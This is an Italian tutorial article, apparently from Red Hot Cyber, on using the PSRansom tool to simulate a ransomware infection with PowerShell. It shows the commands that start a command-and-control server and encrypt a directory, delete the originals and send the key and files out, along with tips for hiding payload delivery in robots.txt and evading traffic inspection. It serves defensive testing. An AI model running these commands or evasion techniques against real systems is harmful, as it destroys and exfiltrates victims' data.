Redazione RHC : 1 Luglio 2022 07:00
Questo progetto chiamato PSransom, ci permette di simulare una infezione di un ransomware generico utilizzando solo PowerShell. Inoltre, saremo in grado di simulare l’esfiltrazione di file attraverso un C2 e persino utilizzarlo sia da Windows che da Linux.
Il numero di campagne ransomware che compaiono ogni giorno è impressionante. Su Red Hot Cyber costantemente pubblichiamo nuove violazioni. Per coloro che non hanno familiarità con il concetto, il ransomware è un tipo di programma dannoso che limita l’accesso a determinate parti o file del sistema operativo infetto e richiede un riscatto in cambio della rimozione di questa restrizione.
Normalmente, questa azione viene eseguita tramite un meccanismo di crittografia, che, per la sua robustezza, complica il processo di recupero. In questo modo, gli aggressori si assicurano che la vittima preferisca pagare il riscatto per non perdere le proprie informazioni e quindi monetizzare.
La NIS2 è complessa da capire?
Non perdere tempo, segui l'anteprima gratuita del corso che stiamo preparando.Accedi quindi alla nostra Academy e segui l'anteprima del corso della durata di 30 minuti per comprendere i contenuti esclusivi che tratteremo nel corso.per ulteriori informazioni, scrivici ad [email protected] oppure scrivici su Whatsapp al 379 163 8765
Supporta RHC attraverso:
In nessun caso e in nessuna circostanza è consigliabile cadere in questa trappola. Dal momento che il fatto di pagare un riscatto incoraggerebbe l’attaccante a trarre nuovamente profitto con altre vittime. Pertanto, la soluzione migliore è avere più backup e un buon piano di emergenza come sempre abbiamo detto su queste pagine.
Ora, come possiamo prepararci a una situazione del genere?
Oltre a mantenere aggiornati i nostri sistemi operativi e antivirus, è importante poter verificare se le misure implementate in un’organizzazione siano efficaci contro questo tipo di attacco.
Naturalmente, ci sono molti modi per simulare un ransomware, sia commerciali che gratuiti. Nel mio caso, utilizzeremo questa soluzione gratuita che consente di:
Il progetto è realizzato interamente in PowerShell, quindi occorre installarlo sul nostro sistema se non utilizziamo Windows. In questo caso utilizzeremo Kali Linux. Pertanto se stai usando un’altra distribuzione, i comandi potrebbero non funzionare.
Per prima cosa scarichiamo il progetto e installiamo PowerShell con i seguenti comandi:
sudo apt install powershell -y git clone https://github.com/JoelGMSec/PSRansom
Una volta scaricato il progetto, avremo due script: PSransom e C2Server . Il primo sarà quello che simulerà l’ infezione ransomware, mentre il secondo si occuperà del recupero dei file e della loro chiave di ripristino.
Successivamente, vedremo cosa può offrire il ransomware e in seguito giocheremo con il server di comando e controllo (C2) . Prima di iniziare, consulteremo la guida utilizzando il parametro -h nel seguente modo:
Come possiamo vedere nell’immagine precedente, l’utilizzo dello strumento è del tutto banale. Dobbiamo solo indicare la directory che vogliamo crittografare, l’IP o il nome host del server C2 e la porta che riceverà la connessione.
Se inoltre vogliamo inviare i file crittografati, dovremo solo aggiungere il parametro-X alla fine del comando. Infine, se vogliamo decifrare, indicheremo la directory in questione e la chiave di ripristino.
Per semplificare, vedremo alcuni esempi di seguito. Innanzitutto, definiremo lo scenario come segue:
Ora che abbiamo chiaro l’ambiente di simulazione, mettiamolo in pratica. La prima cosa che faremo è consultare l’aiuto del C2 per vedere quali opzioni abbiamo:
Come possiamo vedere, anche l’utilizzo del server di comando e controllo è molto semplice. Dovremo solo indicare l’interfaccia che ascolterà la connessione e la porta che la riceverà.
Nel caso specifico ascolteremo su tutte le interfacce e utilizzeremo la porta 80 con il seguente comando:
pwsh C2Server.ps1 + 80
Se tutto è andato bene, dovremmo vedere qualcosa di simile all’immagine precedente. Ricorda che per ascoltare su tutte le interfacce, avremo bisogno dei privilegi di sistema completi.
Successivamente, eseguiremo il processo di crittografia ed esfiltrazione con il seguente comando:
.\PSRansom.ps1 -e Directorio -s ServidorC2 -p Puerto -x
Per eseguire questo processo verrà generata una chiave random di 24 caratteri alfanumerici (minuscolo, maiuscolo e numeri), i dati verranno crittografati in AES256 e la chiave di ripristino verrà inviata al server C2.
Al termine del processo, i file originali verranno eliminati e verranno conservati solo quelli crittografati:
Se andiamo dall’altra parte, dove si trova il nostro server C2, avremmo dovuto ricevere qualcosa di simile a questo:
Come possiamo vedere nello screenshot precedente, riceveremo le informazioni della vittima, la chiave di ripristino, un elenco dei file crittografati e lo stesso, se abbiamo utilizzato il parametro per esfiltrare le informazioni:
Visto che tramite la console non possiamo vedere “cosa sta succedendo sotto il cofano”, utilizziamo un proxy per intercettare il traffico e poter mostrare più in dettaglio il funzionamento del tool.
Per non allungare eccessivamente l’articolo, il processo di comunicazione:
Successivamente, dovremmo avere una situazione tipo quella in calce:
In ciascuna delle richieste, tutto il contenuto verrà inviato crittografato o codificato in modo da non essere rilevato da alcun meccanismo di ispezione del traffico:
Inoltre, il C2 stesso è progettato per eseguire una “consegna del payload” tramite il file robots.txt:
Cioè, potremmo usare Invoke-Stealth per crittografare il nostro PSRansom, salvarlo come robots.txt nella stessa directory del C2 e quindi scaricarlo con PowerShell.
La cosa migliore di tutto questo è che possiamo accedere a questo file solo da PowerShell, essendo totalmente invisibile a qualsiasi browser.
Prima di qualsiasi richiesta che venga fatta al nostro C2, indipendentemente dal percorso o dal metodo (purché sia GET o POST), la risposta sarà sempre la pagina di default che abbiamo visto nell’immagine precedente.
Infine, dobbiamo solo vedere il caso inverso, usando un sistema Linux come vittima:
Poiché PowerShell non ha bisogno di utilizzare alcun tipo di libreria esterna, non sarà necessario intraprendere alcuna azione aggiuntiva per farlo funzionare in modo identico al sistema di Microsoft.
Concludendo, sebbene abbiamo richiesto di esfiltrare i file, questo processo non verrà eseguito (poiché non è possibile, se non c’è comunicazione). Successivamente, sia la chiave di ripristino che il file di registro verranno salvati in un file , all’interno del percorso da cui abbiamo avviato lo strumento.
In questo modo è garantito di poter recuperare i file in caso di esecuzione accidentale o se eseguiamo questo processo da una shell remota su un host che non ha alcun tipo di comunicazione.
Ovviamente, quest’ultimo caso renderebbe le cose molto più facili per il team di risposta agli incidenti, poiché la chiave non sarebbe in memoria e sarebbe molto facile recuperarla per procedere con il processo di decrittazione.Come conclusione finale, lo strumento è in fase “beta” ed è probabile che fallisca in alcuni scenari. Se trovate bug o suggerimenti, non esitate a contattare lo sviluppatore a questo link: https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell/